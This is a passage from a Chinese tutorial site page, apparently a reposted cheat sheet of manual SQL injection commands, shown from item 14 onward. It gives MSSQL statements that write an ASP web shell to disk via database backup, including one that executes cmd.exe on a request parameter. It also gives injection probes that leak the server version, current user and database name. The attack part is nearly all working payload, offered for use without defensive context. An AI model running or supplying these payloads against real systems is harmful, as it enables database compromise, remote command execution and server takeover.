当前位置: 网学 > 编程文档 > ASP > 正文

整理了下手动注入脚本命令[带注释]

来源:Http://myeducs.cn 联系QQ:点击这里给我发消息 作者: 用户投稿 来源: 网络 发布时间: 13/06/17


14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values (''<% Dim oScript %>'');
backup database model to disk=''c:\l.asp'';

15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()=''dbo'' 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库

16.简洁的webshell

use model

create table cmd(str image);

insert into cmd(str) values (''<%=server.createobject("wscript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>'');

backup database model to disk=''g:\wwwtest\l.asp'';
  • 上一篇资讯: ASP远程保存图片
  • 网学推荐

    免费论文

    原创论文

    浏览:
    设为首页 | 加入收藏 | 论文首页 | 论文专题 | 设计下载 | 网学软件 | 论文模板 | 论文资源 | 程序设计 | 关于网学 | 站内搜索 | 网学留言 | 友情链接 | 资料中心
    版权所有 QQ:3710167 邮箱:3710167@qq.com 网学网 [Myeducs.cn] 您电脑的分辨率是 像素
    Copyright 2008-2015 myeducs.Cn www.myeducs.Cn All Rights Reserved
    湘ICP备09003080号